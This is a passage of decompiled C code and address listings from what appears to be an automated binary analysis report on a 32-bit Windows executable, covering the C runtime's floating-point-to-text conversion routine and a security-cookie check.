                							__eflags = _t625 - 0xbffd;
                							if(_t625 > 0xbffd) {
                								goto L137;
                							}
                							__eflags = _t625 - 0x3fbf;
                							if(_t625 > 0x3fbf) {
                								_t416 = 0;
                								__eflags = _t523;
                								if(_t523 != 0) {
                									L100:
                									__eflags = _t593 - _t416;
                									if(_t593 != _t416) {
                										L104:
                										_v92 = _t416;
                										_t614 =  &_v16;
                										_v68 = 5;
                										do {
                											_t524 = _v68;
                											_t420 = _v92 + _v92;
                											_v88 = _t524;
                											__eflags = _t524;
                											if(_t524 <= 0) {
                												goto L113;
                											}
                											_v76 =  &_v44;
                											_t435 = _t653 + _t420 - 0x20;
                											do {
                												_v72 = _v72 & 0x00000000;
                												_t544 = ( *_v76 & 0x0000ffff) * ( *_t435 & 0x0000ffff);
                												_t595 =  *(_t614 - 4);
                												_t489 = _t595 + _t544;
                												__eflags = _t489 - _t595;
                												if(_t489 < _t595) {
                													L109:
                													_v72 = 1;
                													goto L110;
                												}
                												__eflags = _t489 - _t544;
                												if(_t489 >= _t544) {
                													goto L110;
                												}
                												goto L109;
                												L110:
                												__eflags = _v72;
                												 *(_t614 - 4) = _t489;
                												if(_v72 != 0) {
                													 *_t614 =  *_t614 + 1;
                													__eflags =  *_t614;
                												}
                												_v76 = _v76 - 2;
                												_t435 =  &(_t435[1]);
                												_v88 = _v88 - 1;
                												__eflags = _v88;
                											} while (_v88 > 0);
                											L113:
                											_t614 =  &(_t614[0]);
                											_v92 = _v92 + 1;
                											_v68 = _v68 - 1;
                											__eflags = _v68;
                										} while (_v68 > 0);
                										_t638 = _t625 + 0xc002;
                										__eflags = _t638;
                										if(_t638 <= 0) {
                											L118:
                											_t625 = _t638 + 0xffff;
                											__eflags = _t625;
                											if(_t625 >= 0) {
                												L125:
                												__eflags = _v20 - 0x8000;
                												if(_v20 > 0x8000) {
                													L127:
                													__eflags = _v18 - 0xffffffff;
                													if(_v18 != 0xffffffff) {
                														_t260 =  &_v18;
                														 *_t260 = _v18 + 1;
                														__eflags =  *_t260;
                													} else {
                														_v18 = _v18 & 0x00000000;
                														__eflags = _v14 - 0xffffffff;
                														if(_v14 != 0xffffffff) {
                															_v14 = _v14 + 1;
                														} else {
                															_v14 = _v14 & 0x00000000;
                															__eflags = _v10 - 0xffff;
                															if(_v10 != 0xffff) {
                																_v10 = _v10 + 1;
                															} else {
                																_v10 = 0x8000;
                																_t625 = _t625 + 1;
                															}
                														}
                													}
                													L134:
                													__eflags = _t625 - 0x7fff;
                													if(_t625 < 0x7fff) {
                														_t625 = _t625 | _v96;
                														_v36 = _v18;
                														_v34 = _v16;
                														_v30 = _v12;
                														_v26 = _t625;
                													} else {
                														__eflags = _v96;
                														_v32 = 0;
                														_v36 = 0;
                														_v28 = ((0 | _v96 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                													}
                													goto L139;
                												}
                												__eflags = (_v20 & 0x0001ffff) - 0x18000;
                												if((_v20 & 0x0001ffff) != 0x18000) {
                													goto L134;
                												}
                												goto L127;
                											}
                											_t429 =  ~_t625 & 0x0000ffff;
                											_t625 = _t625 + _t429;
                											__eflags = _t625;
                											do {
                												__eflags = _v20 & 0x00000001;
                												if((_v20 & 0x00000001) != 0) {
                													_t233 =  &_v84;
                													 *_t233 = _v84 + 1;
                													__eflags =  *_t233;
                												}
                												_v12 = _v12 >> 1;
                												_t429 = _t429 - 1;
                												__eflags = _t429;
                												_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
                												_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
                											} while (_t429 != 0);
                											__eflags = _v84 - _t429;
                											if(_v84 != _t429) {
                												_t244 =  &_v20;
                												 *_t244 = _v20 | 0x00000001;
                												__eflags =  *_t244;
                											}
                											goto L125;
                										} else {
                											goto L115;
                										}
                										while(1) {
                											L115:
                											_t619 = _v12;
                											__eflags = _t619;
                											if(_t619 < 0) {
                												break;
                											}
                											_t430 = _v16;
                											_v20 = _v20 << 1;
                											_v16 = _t430 + _t430 | _v20 >> 0x0000001f;
                											_t638 = _t638 + 0xffff;
                											_v12 = _t619 + _t619 | _t430 >> 0x0000001f;
                											__eflags = _t638;
                											if(_t638 > 0) {
                												continue;
                											}
                											break;
                										}
                										__eflags = _t638;
                										if(_t638 > 0) {
                											goto L125;
                										}
                										goto L118;
                									}
                									_t625 = _t625 + 1;
                									__eflags = _v44 & 0x7fffffff;
                									if((_v44 & 0x7fffffff) != 0) {
                										goto L104;
                									}
                									__eflags = _v48 - _t416;
                									if(_v48 != _t416) {
                										goto L104;
                									}
                									__eflags = _v52 - _t416;
                									if(_v52 == _t416) {
                										L92:
                										_v32 = _t416;
                										_v36 = _t416;
                										goto L138;
                									}
                									goto L104;
                								}
                								_t625 = _t625 + 1;
                								__eflags = _v28 & 0x7fffffff;
                								if((_v28 & 0x7fffffff) != 0) {
                									goto L100;
                								}
                								__eflags = _v32;
                								if(_v32 != 0) {
                									goto L100;
                								}
                								__eflags = _v36;
                								if(_v36 != 0) {
                									goto L100;
                								}
                								_v26 = 0;
                								goto L139;
                							}
                							_t416 = 0;
                							__eflags = 0;
                							goto L92;
                						} else {
                							if(__eflags < 0) {
                								_t483 =  ~_t483;
                								__eflags = 0x42b4e0;
                								_v104 = 0x42b480;
                							}
                							__eflags = _t483;
                							if(_t483 == 0) {
                								goto L86;
                							} else {
                								goto L32;
                							}
                							do {
                								L32:
                								_v104 = _v104 + 0x54;
                								_t546 = _t483 & 0x00000007;
                								_t483 = _t483 >> 3;
                								__eflags = _t546;
                								if(_t546 == 0) {
                									L84:
                									_t625 = 0;
                									__eflags = 0;
                									goto L85;
                								}
                								_t548 = _t546 * 0xc + _v104;
                								_t437 = _t548;
                								_v72 = _t548;
                								__eflags =  *_t437 - 0x8000;
                								if( *_t437 >= 0x8000) {
                									asm("movsd");
                									asm("movsd");
                									_t437 =  &_v64;
                									asm("movsd");
                									_t54 =  &_v62;
                									 *_t54 = _v62 - 1;
                									__eflags =  *_t54;
                									_v72 = _t437;
                								}
                								_t600 =  *(_t437 + 0xa) & 0x0000ffff;
                								_v88 = 0;
                								_v20 = 0;
                								_v16 = 0;
                								_v12 = 0;
                								_t551 = _v26;
                								_v76 = (_t600 ^ _t551) & 0x00008000;
                								_t552 = _t551 & 0x00007fff;
                								_t601 = _t600 & 0x00007fff;
                								_t620 = _t601 + _t552 & 0x0000ffff;
                								__eflags = _t552 - 0x7fff;
                								if(_t552 >= 0x7fff) {
                									L94:
                									_t625 = 0;
                									__eflags = _v76;
                									_v28 = ((0 | _v76 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                									goto L41;
                								} else {
                									__eflags = _t601 - 0x7fff;
                									if(_t601 >= 0x7fff) {
                										goto L94;
                									}
                									__eflags = _t620 - 0xbffd;
                									if(_t620 > 0xbffd) {
                										goto L94;
                									}
                									__eflags = _t620 - 0x3fbf;
                									if(_t620 > 0x3fbf) {
                										_t625 = 0;
                										__eflags = _t552;
                										if(_t552 != 0) {
                											L47:
                											__eflags = _t601 - _t625;
                											if(_t601 != _t625) {
                												L51:
                												_t78 =  &_v92;
                												 *_t78 = _v92 & _t625;
                												__eflags =  *_t78;
                												_t647 =  &_v16;
                												_v68 = 5;
                												do {
                													_t602 = _v68;
                													_t554 = _v92 + _v92;
                													_v84 = _t602;
                													__eflags = _t602;
                													if(_t602 <= 0) {
                														goto L61;
                													}
                													_t443 = _t437 + 8;
                													__eflags = _t443;
                													_v112 = _t653 + _t554 - 0x20;
                													_v108 = _t443;
                													do {
                														_t607 =  *((intOrPtr*)(_t647 - 4));
                														_t573 = ( *_v112 & 0x0000ffff) * ( *_v108 & 0x0000ffff);
                														_v96 = _v96 & 0x00000000;
                														_t447 = _t607 + _t573;
                														__eflags = _t447 - _t607;
                														if(_t447 < _t607) {
                															L56:
                															_v96 = 1;
                															goto L57;
                														}
                														__eflags = _t447 - _t573;
                														if(_t447 >= _t573) {
                															goto L57;
                														}
                														goto L56;
                														L57:
                														__eflags = _v96;
                														 *((intOrPtr*)(_t647 - 4)) = _t447;
                														if(_v96 != 0) {
                															 *_t647 =  *_t647 + 1;
                															__eflags =  *_t647;
                														}
                														_v112 =  &(_v112[1]);
                														_v108 = _v108 - 2;
                														_v84 = _v84 - 1;
                														__eflags = _v84;
                													} while (_v84 > 0);
                													_t437 = _v72;
                													L61:
                													_t647 =  &(_t647[0]);
                													_v92 = _v92 + 1;
                													_v68 = _v68 - 1;
                													__eflags = _v68;
                												} while (_v68 > 0);
                												_t622 = _t620 + 0xc002;
                												__eflags = _t622;
                												if(_t622 <= 0) {
                													L66:
                													_t622 = _t622 + 0xffff;
                													__eflags = _t622;
                													if(_t622 >= 0) {
                														L73:
                														__eflags = _v20 - 0x8000;
                														if(_v20 > 0x8000) {
                															L75:
                															__eflags = _v18 - 0xffffffff;
                															if(_v18 != 0xffffffff) {
                																_t151 =  &_v18;
                																 *_t151 = _v18 + 1;
                																__eflags =  *_t151;
                															} else {
                																_v18 = _v18 & 0x00000000;
                																__eflags = _v14 - 0xffffffff;
                																if(_v14 != 0xffffffff) {
                																	_v14 = _v14 + 1;
                																} else {
                																	_v14 = _v14 & 0x00000000;
                																	__eflags = _v10 - 0xffff;
                																	if(_v10 != 0xffff) {
                																		_v10 = _v10 + 1;
                																	} else {
                																		_v10 = 0x8000;
                																		_t622 = _t622 + 1;
                																	}
                																}
                															}
                															L82:
                															__eflags = _t622 - 0x7fff;
                															if(_t622 < 0x7fff) {
                																_v36 = _v18;
                																_v34 = _v16;
                																_v30 = _v12;
                																_v26 = _t622 | _v76;
                															} else {
                																__eflags = _v76;
                																_v32 = 0;
                																_v36 = 0;
                																_t560 = ((0 | _v76 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                																__eflags = _t560;
                																_v28 = _t560;
                															}
                															goto L84;
                														}
                														__eflags = (_v20 & 0x0001ffff) - 0x18000;
                														if((_v20 & 0x0001ffff) != 0x18000) {
                															goto L82;
                														}
                														goto L75;
                													}
                													_t456 =  ~_t622 & 0x0000ffff;
                													_t622 = _t622 + _t456;
                													__eflags = _t622;
                													do {
                														__eflags = _v20 & 0x00000001;
                														if((_v20 & 0x00000001) != 0) {
                															_t124 =  &_v88;
                															 *_t124 = _v88 + 1;
                															__eflags =  *_t124;
                														}
                														_v12 = _v12 >> 1;
                														_t456 = _t456 - 1;
                														__eflags = _t456;
                														_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
                														_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
                													} while (_t456 != 0);
                													__eflags = _v88 - _t456;
                													if(_v88 != _t456) {
                														_t135 =  &_v20;
                														 *_t135 = _v20 | 0x00000001;
                														__eflags =  *_t135;
                													}
                													goto L73;
                												} else {
                													goto L63;
                												}
                												while(1) {
                													L63:
                													__eflags = _v12 & 0x80000000;
                													if((_v12 & 0x80000000) != 0) {
                														break;
                													}
                													_t457 = _v16;
                													_v20 = _v20 << 1;
                													_v16 = _t457 + _t457 | _v20 >> 0x0000001f;
                													_t622 = _t622 + 0xffff;
                													_v12 = _v12 + _v12 | _t457 >> 0x0000001f;
                													__eflags = _t622;
                													if(_t622 > 0) {
                														continue;
                													}
                													break;
                												}
                												__eflags = _t622;
                												if(_t622 > 0) {
                													goto L73;
                												}
                												goto L66;
                											}
                											_t620 = _t620 + 1;
                											__eflags =  *(_t437 + 8) & 0x7fffffff;
                											if(( *(_t437 + 8) & 0x7fffffff) != 0) {
                												goto L51;
                											}
                											__eflags =  *((intOrPtr*)(_t437 + 4)) - _t625;
                											if( *((intOrPtr*)(_t437 + 4)) != _t625) {
                												goto L51;
                											}
                											__eflags =  *_t437 - _t625;
                											if( *_t437 == _t625) {
                												L40:
                												_v28 = _t625;
                												L41:
                												_v32 = _t625;
                												_v36 = _t625;
                												goto L85;
                											}
                											goto L51;
                										}
                										_t620 = _t620 + 1;
                										__eflags = _v28 & 0x7fffffff;
                										if((_v28 & 0x7fffffff) != 0) {
                											goto L47;
                										}
                										__eflags = _v32;
                										if(_v32 != 0) {
                											goto L47;
                										}
                										__eflags = _v36;
                										if(_v36 != 0) {
                											goto L47;
                										}
                										_v26 = 0;
                										goto L85;
                									}
                									_t625 = 0;
                									__eflags = 0;
                									goto L40;
                								}
                								L85:
                								__eflags = _t483 - _t625;
                							} while (_t483 != _t625);
                							goto L86;
                						}
                					}
                					 *_t479 = 1;
                					__eflags = _t625 - 0x80000000;
                					if(_t625 != 0x80000000) {
                						L11:
                						__eflags = _t625 & 0x40000000;
                						if((_t625 & 0x40000000) != 0) {
                							L13:
                							__eflags = _t497;
                							if(_t497 == 0) {
                								L17:
                								__eflags = _t625 - 0x80000000;
                								if(_t625 != 0x80000000) {
                									L23:
                									_push("1#QNAN");
                									goto L24;
                								}
                								__eflags = _t609;
                								if(_t609 != 0) {
                									goto L23;
                								} else {
                									_push("1#INF");
                									L20:
                									_push(0x16);
                									_push(_t479 + 4);
                									_t473 = E004068D0(_t575);
                									_t625 = 0;
                									__eflags = _t473;
                									if(_t473 != 0) {
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										E004063C4(_t497, _t575, _t609, 0);
                									}
                									 *((char*)(_t479 + 3)) = 5;
                									goto L27;
                								}
                							}
                							__eflags = _t625 - 0xc0000000;
                							if(_t625 != 0xc0000000) {
                								goto L17;
                							}
                							__eflags = _t609;
                							if(_t609 != 0) {
                								goto L23;
                							} else {
                								_push("1#IND");
                								goto L20;
                							}
                						} else {
                							_push("1#SNAN");
                							L24:
                							_push(0x16);
                							_push(_t479 + 4);
                							_t470 = E004068D0(_t575);
                							_t625 = 0;
                							__eflags = _t470;
                							if(_t470 != 0) {
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								E004063C4(_t497, _t575, _t609, 0);
                							}
                							 *((char*)(_t479 + 3)) = 6;
                							L27:
                							_t389 = 0;
                							goto L170;
                						}
                					}
                					__eflags = _t609;
                					if(_t609 == 0) {
                						goto L13;
                					}
                					goto L11;
                				} else {
                					_t575 = 0;
                					 *_t479 = 0;
                					 *((char*)(_t479 + 2)) = ((0x8000 | _t497 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
                					 *((char*)(_t479 + 3)) = 1;
                					 *((char*)(_t479 + 4)) = 0x30;
                					 *((char*)(_t479 + 5)) = 0;
                					L7:
                					_t389 = 1;
                					L170:
                					_t359 =  &_v8; // 0x410d30
                					return E0040533B(_t389, _t489,  *_t359 ^ _t653, _t575, _t609, _t625);
                				}
                			}

















































































































                0x00412522
                0x00412529
                0x0041252d
                0x00412538
                0x00412539
                0x0041253a
                0x0041253c
                0x00412546
                0x00412548
                0x0041254e
                0x00412551
                0x00412555
                0x00412559
                0x0041255d
                0x00412561
                0x00412565
                0x00412569
                0x0041256d
                0x00412571
                0x00412575
                0x00412579
                0x0041257d
                0x00412581
                0x00412588
                0x0041258e
                0x00412596
                0x00412590
                0x00412590
                0x00412590
                0x0041259a
                0x0041259d
                0x004125a3
                0x004125d9
                0x004125dc
                0x004126a4
                0x004126ac
                0x004126b5
                0x004126ba
                0x004126bd
                0x004126c1
                0x004126c4
                0x004126c7
                0x004126ca
                0x004126cc
                0x0041296e
                0x00412971
                0x0041297e
                0x00412981
                0x00412c2a
                0x00412c2a
                0x00412c2e
                0x00412c31
                0x00412c34
                0x00412c37
                0x00412c3a
                0x00412c6e
                0x00412c6e
                0x00412c71
                0x00412c75
                0x00412c75
                0x00412c7c
                0x00412c82
                0x00412c84
                0x00412c88
                0x00412c8f
                0x00412c98
                0x00412cac
                0x00412cac
                0x00412cac
                0x00412caf
                0x00412cb2
                0x00412cb2
                0x00412cb7
                0x00412cb9
                0x00412ced
                0x00412ced
                0x00412cf0
                0x00412cf3
                0x00412cf6
                0x00412cf9
                0x00412cfb
                0x00412db6
                0x00412db6
                0x00412db9
                0x00412dba
                0x00412dbc
                0x00412dcc
                0x00412dcc
                0x00412dcf
                0x00000000
                0x00000000
                0x00412dc3
                0x00412dc6
                0x00000000
                0x00000000
                0x00412dc8
                0x00412dcb
                0x00412dcb
                0x00412dcb
                0x00412dd1
                0x00412dd4
                0x00412dd7
                0x00412dd9
                0x00412dda
                0x00412dda
                0x00412dda
                0x00412ddd
                0x00412ddd
                0x00412ddf
                0x00412de1
                0x00412de1
                0x00412de7
                0x00412dea
                0x00412def
                0x00000000
                0x00412def
                0x00412dbe
                0x00412e07
                0x00412e07
                0x00412e09
                0x00000000
                0x00000000
                0x00412e01
                0x00412e04
                0x00000000
                0x00000000
                0x00412e06
                0x00412e06
                0x00412e06
                0x00412e0b
                0x00412e0e
                0x00412e10
                0x00000000
                0x00000000
                0x00412e14
                0x00412e1c
                0x00412e20
                0x00412e2c
                0x00412e2f
                0x00412e32
                0x00412e35
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00412d01
                0x00412d01
                0x00412d04
                0x00412d0d
                0x00412d0e
                0x00412d0f
                0x00412d10
                0x00412d16
                0x00412d1f
                0x00412d38
                0x00412d3e
                0x00412d40
                0x00412d43
                0x00412d45
                0x00412d48
                0x00412d4a
                0x00412d50
                0x00412d50
                0x00412d53
                0x00412d55
                0x00412d57
                0x00412d5e
                0x00412d60
                0x00412d60
                0x00412d61
                0x00412d61
                0x00412d63
                0x00412d65
                0x00412d67
                0x00412d67
                0x00412d67
                0x00412d68
                0x00412d68
                0x00412d6b
                0x00412d6e
                0x00412d71
                0x00412d73
                0x00412d79
                0x00412d79
                0x00412d79
                0x00000000
                0x00412d79
                0x00412d75
                0x00412d77
                0x00000000
                0x00000000
                0x00000000
                0x00412d77
                0x00412d59
                0x00412d5c
                0x00000000
                0x00000000
                0x00000000
                0x00412d5c
                0x00412d4c
                0x00412d4e
                0x00000000
                0x00000000
                0x00000000
                0x00412d7a
                0x00412d7d
                0x00412d82
                0x00412d87
                0x00412d8a
                0x00412d8d
                0x00412d9d
                0x00412d9f
                0x00412da1
                0x00412da2
                0x00412da5
                0x00412da9
                0x00412dac
                0x00412dac
                0x00000000
                0x00412d01
                0x00412cbd
                0x00412cbd
                0x00412cc3
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00412cc5
                0x00412cc5
                0x00412cce
                0x00412ce2
                0x00412ce3
                0x00412ce6
                0x00412ce9
                0x00412ce9
                0x00000000
                0x00412cc5
                0x00412c3d
                0x00412c3f
                0x00412c41
                0x00000000
                0x00000000
                0x00412c45
                0x00412c4d
                0x00412c51
                0x00412c5e
                0x00412c61
                0x00412c65
                0x00000000
                0x00412c65
                0x00412987
                0x0041298c
                0x0041298f
                0x00412992
                0x00412995
                0x00412998
                0x0041299b
                0x004129a2
                0x004129a4
                0x004129a6
                0x004129b1
                0x004129b4
                0x004129b7
                0x004129ba
                0x00412c0c
                0x00412c0e
                0x00412c14
                0x00412c1e
                0x00412c23
                0x00412c23
                0x00412c23
                0x00412c27
                0x00412c27
                0x00000000
                0x00412c27
                0x004129c0
                0x004129c3
                0x00000000
                0x00000000
                0x004129ce
                0x004129d1
                0x00000000
                0x00000000
                0x004129dc
                0x004129df
                0x00412a2c
                0x00412a2e
                0x00412a31
                0x00412a50
                0x00412a50
                0x00412a53
                0x00412a6d
                0x00412a6d
                0x00412a70
                0x00412a73
                0x00412a7a
                0x00412a7d
                0x00412a80
                0x00412a82
                0x00412a85
                0x00412a87
                0x00000000
                0x00000000
                0x00412a8c
                0x00412a8f
                0x00412a93
                0x00412a9c
                0x00412aa0
                0x00412aa3
                0x00412aa6
                0x00412aa9
                0x00412aab
                0x00412ab1
                0x00412ab1
                0x00000000
                0x00412ab1
                0x00412aad
                0x00412aaf
                0x00000000
                0x00000000
                0x00000000
                0x00412ab8
                0x00412ab8
                0x00412abc
                0x00412abf
                0x00412ac1
                0x00412ac1
                0x00412ac1
                0x00412ac4
                0x00412ac9
                0x00412aca
                0x00412acd
                0x00412acd
                0x00412ad3
                0x00412ad4
                0x00412ad5
                0x00412ad8
                0x00412adb
                0x00412adb
                0x00412ae1
                0x00412ae7
                0x00412aea
                0x00412b23
                0x00412b23
                0x00412b29
                0x00412b2c
                0x00412b70
                0x00412b77
                0x00412b7b
                0x00412b8e
                0x00412b8e
                0x00412b92
                0x00412bbf
                0x00412bbf
                0x00412bbf
                0x00412b94
                0x00412b94
                0x00412b98
                0x00412b9c
                0x00412bba
                0x00412b9e
                0x00412b9e
                0x00412ba7
                0x00412bab
                0x00412bb4
                0x00412bad
                0x00412bad
                0x00412bb1
                0x00412bb1
                0x00412bab
                0x00412b9c
                0x00412bc2
                0x00412bc7
                0x00412bca
                0x00412bf3
                0x00412bf6
                0x00412bfd
                0x00412c03
                0x00412c06
                0x00412bcc
                0x00412bd0
                0x00412bd4
                0x00412bda
                0x00412bea
                0x00412bea
                0x00000000
                0x00412bca
                0x00412b86
                0x00412b8c
                0x00000000
                0x00000000
                0x00000000
                0x00412b8c
                0x00412b32
                0x00412b35
                0x00412b35
                0x00412b37
                0x00412b37
                0x00412b3b
                0x00412b3d
                0x00412b3d
                0x00412b3d
                0x00412b3d
                0x00412b49
                0x00412b5d
                0x00412b5d
                0x00412b5e
                0x00412b61
                0x00412b61
                0x00412b66
                0x00412b69
                0x00412b6b
                0x00412b6b
                0x00412b6b
                0x00412b6b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00412aec
                0x00412aec
                0x00412aec
                0x00412aef
                0x00412af1
                0x00000000
                0x00000000
                0x00412af3
                0x00412af9
                0x00412b05
                0x00412b10
                0x00412b16
                0x00412b19
                0x00412b1c
                0x00000000
                0x00000000
                0x00000000
                0x00412b1c
                0x00412b1e
                0x00412b21
                0x00000000
                0x00000000
                0x00000000
                0x00412b21
                0x00412a55
                0x00412a56
                0x00412a5d
                0x00000000
                0x00000000
                0x00412a5f
                0x00412a62
                0x00000000
                0x00000000
                0x00412a64
                0x00412a67
                0x004129e3
                0x004129e3
                0x004129e6
                0x00000000
                0x004129e6
                0x00000000
                0x00412a67
                0x00412a33
                0x00412a34
                0x00412a3b
                0x00000000
                0x00000000
                0x00412a3d
                0x00412a40
                0x00000000
                0x00000000
                0x00412a42
                0x00412a45
                0x00000000
                0x00000000
                0x00412a47
                0x00000000
                0x00412a47
                0x004129e1
                0x004129e1
                0x00000000
                0x004126d2
                0x004126d2
                0x004126d9
                0x004126db
                0x004126de
                0x004126de
                0x004126e1
                0x004126e3
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004126e9
                0x004126e9
                0x004126e9
                0x004126ef
                0x004126f2
                0x004126f5
                0x004126f7
                0x00412964
                0x00412964
                0x00412964
                0x00000000
                0x00412964
                0x00412700
                0x00412703
                0x00412705
                0x0041270d
                0x00412710
                0x00412717
                0x00412718
                0x00412719
                0x0041271c
                0x0041271d
                0x0041271d
                0x0041271d
                0x00412720
                0x00412720
                0x00412723
                0x00412729
                0x0041272c
                0x0041272f
                0x00412732
                0x00412735
                0x00412742
                0x0041274a
                0x0041274c
                0x00412751
                0x00412759
                0x0041275c
                0x00412a0e
                0x00412a10
                0x00412a12
                0x00412a24
                0x00000000
                0x00412762
                0x00412762
                0x00412765
                0x00000000
                0x00000000
                0x00412770
                0x00412773
                0x00000000
                0x00000000
                0x0041277e
                0x00412781
                0x00412793
                0x00412795
                0x00412798
                0x004127b9
                0x004127b9
                0x004127bc
                0x004127d1
                0x004127d1
                0x004127d1
                0x004127d1
                0x004127d4
                0x004127d7
                0x004127de
                0x004127e1
                0x004127e4
                0x004127e6
                0x004127e9
                0x004127eb
                0x00000000
                0x00000000
                0x004127f1
                0x004127f1
                0x004127f4
                0x004127f7
                0x004127fa
                0x00412806
                0x00412809
                0x0041280c
                0x00412810
                0x00412813
                0x00412815
                0x0041281b
                0x0041281b
                0x00000000
                0x0041281b
                0x00412817
                0x00412819
                0x00000000
                0x00000000
                0x00000000
                0x00412822
                0x00412822
                0x00412826
                0x00412829
                0x0041282b
                0x0041282b
                0x0041282b
                0x0041282e
                0x00412832
                0x00412836
                0x00412839
                0x00412839
                0x0041283f
                0x00412842
                0x00412843
                0x00412844
                0x00412847
                0x0041284a
                0x0041284a
                0x00412850
                0x00412856
                0x00412859
                0x00412896
                0x00412896
                0x0041289c
                0x0041289f
                0x004128e3
                0x004128ea
                0x004128ee
                0x00412901
                0x00412901
                0x00412905
                0x00412932
                0x00412932
                0x00412932
                0x00412907
                0x00412907
                0x0041290b
                0x0041290f
                0x0041292d
                0x00412911
                0x00412911
                0x0041291a
                0x0041291e
                0x00412927
                0x00412920
                0x00412920
                0x00412924
                0x00412924
                0x0041291e
                0x0041290f
                0x00412935
                0x0041293a
                0x0041293d
                0x004129f5
                0x004129fc
                0x00412a02
                0x00412a05
                0x00412943
                0x00412947
                0x0041294b
                0x00412951
                0x0041295b
                0x0041295b
                0x00412961
                0x00412961
                0x00000000
                0x0041293d
                0x004128f9
                0x004128ff
                0x00000000
                0x00000000
                0x00000000
                0x004128ff
                0x004128a5
                0x004128a8
                0x004128a8
                0x004128aa
                0x004128aa
                0x004128ae
                0x004128b0
                0x004128b0
                0x004128b0
                0x004128b0
                0x004128bc
                0x004128d0
                0x004128d0
                0x004128d1
                0x004128d4
                0x004128d4
                0x004128d9
                0x004128dc
                0x004128de
                0x004128de
                0x004128de
                0x004128de
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041285b
                0x0041285b
                0x0041285b
                0x00412862
                0x00000000
                0x00000000
                0x00412864
                0x0041286a
                0x00412876
                0x00412883
                0x00412889
                0x0041288c
                0x0041288f
                0x00000000
                0x00000000
                0x00000000
                0x0041288f
                0x00412891
                0x00412894
                0x00000000
                0x00000000
                0x00000000
                0x00412894
                0x004127be
                0x004127bf
                0x004127c6
                0x00000000
                0x00000000
                0x004127c8
                0x004127cb
                0x00000000
                0x00000000
                0x004127cd
                0x004127cf
                0x00412785
                0x00412785
                0x00412788
                0x00412788
                0x0041278b
                0x00000000
                0x0041278b
                0x00000000
                0x004127cf
                0x0041279a
                0x0041279b
                0x004127a2
                0x00000000
                0x00000000
                0x004127a4
                0x004127a7
                0x00000000
                0x00000000
                0x004127a9
                0x004127ac
                0x00000000
                0x00000000
                0x004127b0
                0x00000000
                0x004127b0
                0x00412783
                0x00412783
                0x00000000
                0x00412783
                0x00412966
                0x00412966
                0x00412966
                0x00000000
                0x004126e9
                0x004126cc
                0x004125e5
                0x004125ed
                0x004125ef
                0x004125f5
                0x004125f5
                0x004125fb
                0x00412604
                0x00412604
                0x00412607
                0x0041261c
                0x0041261c
                0x0041261e
                0x00412650
                0x00412650
                0x00000000
                0x00412650
                0x00412620
                0x00412622
                0x00000000
                0x00412624
                0x00412624
                0x00412629
                0x0041262c
                0x0041262e
                0x0041262f
                0x00412637
                0x00412639
                0x0041263b
                0x0041263d
                0x0041263e
                0x0041263f
                0x00412640
                0x00412641
                0x00412642
                0x00412647
                0x0041264a
                0x00000000
                0x0041264a
                0x00412622
                0x00412609
                0x0041260f
                0x00000000
                0x00000000
                0x00412611
                0x00412613
                0x00000000
                0x00412615
                0x00412615
                0x00000000
                0x00412615
                0x004125fd
                0x004125fd
                0x00412655
                0x00412658
                0x0041265a
                0x0041265b
                0x00412663
                0x00412665
                0x00412667
                0x00412669
                0x0041266a
                0x0041266b
                0x0041266c
                0x0041266d
                0x0041266e
                0x00412673
                0x00412676
                0x0041267a
                0x0041267a
                0x00000000
                0x0041267a
                0x004125fb
                0x004125f1
                0x004125f3
                0x00000000
                0x00000000
                0x00000000
                0x004125ad
                0x004125ad
                0x004125bb
                0x004125be
                0x004125c1
                0x004125c5
                0x004125c9
                0x004125cc
                0x004125ce
                0x00412df2
                0x00412df2
                0x00412e00
                0x00412e00

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __invoke_watson_strcpy_s
                • String ID: 0A$1#IND$1#INF$1#QNAN$1#SNAN$?$T
                • API String ID: 3990783250-4223663711
                • Opcode ID: 79a6f41ba8228fef75e1be480c02d21ddbb6ffad5278a54dee1caee9ab74faab
                • Instruction ID: 1c8359ebcc323d5997ae362db3a09dfdd5e4ba76c3a6d7451d9804dcfa0fd4e9
                • Opcode Fuzzy Hash: 79a6f41ba8228fef75e1be480c02d21ddbb6ffad5278a54dee1caee9ab74faab
                • Instruction Fuzzy Hash: 8C629F71E0065A8BDF24CFA8C6502EEB7B1FF54310F14816BD855EB381D7B85A92CB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040533B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                				intOrPtr _v0;
                				void* _v804;
                				intOrPtr _v808;
                				intOrPtr _v812;
                				intOrPtr _t6;
                				intOrPtr _t11;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				long _t17;
                				intOrPtr _t21;
                				intOrPtr _t22;
                				intOrPtr _t25;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				intOrPtr* _t31;
                				void* _t34;
                
                				_t27 = __esi;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ecx;
                				_t21 = __ebx;
                				_t6 = __eax;
                				_t34 = _t22 -  *0x42a280; // 0x394af7
                				if(_t34 == 0) {
                					asm("repe ret");
                				}
                				 *0x42c210 = _t6;
